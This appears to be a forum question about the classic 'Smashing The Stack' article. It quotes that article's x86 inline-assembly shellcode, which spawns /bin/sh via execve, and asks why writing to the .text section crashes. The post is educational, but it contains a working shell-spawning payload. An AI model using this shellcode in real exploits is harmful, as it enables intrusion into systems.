# Exploit stack buffer overflow, error while access address of section text

Tags: c, assembly, exploit

I learned exploit through article ["Smashing The Stack For Fun And Profit"](http://www.phrack.com/issues.html?issue=49&id=14&mode=txt)
and i have some some question about this example

```
void main() {
__asm__("
    jmp    0x2a                     # 3 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2f                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes
");
}
```

after call -0x2f, register %esi have address of address of string "/bin/sh", this one also is address of section .text. My implement always crash at line code:

`movl   %esi,0x8(%esi)           # 3 bytes`

How can access and use a address that belonged to section .text like beyond example.

Comment: For anyone here to help you understand/fix that uncommented assembler code, they'd need to read that entire article on your behalf...

Comment: I don't know... Article from phrack.org (= phrack.com)... I wonder what kind of stuff the OP is after...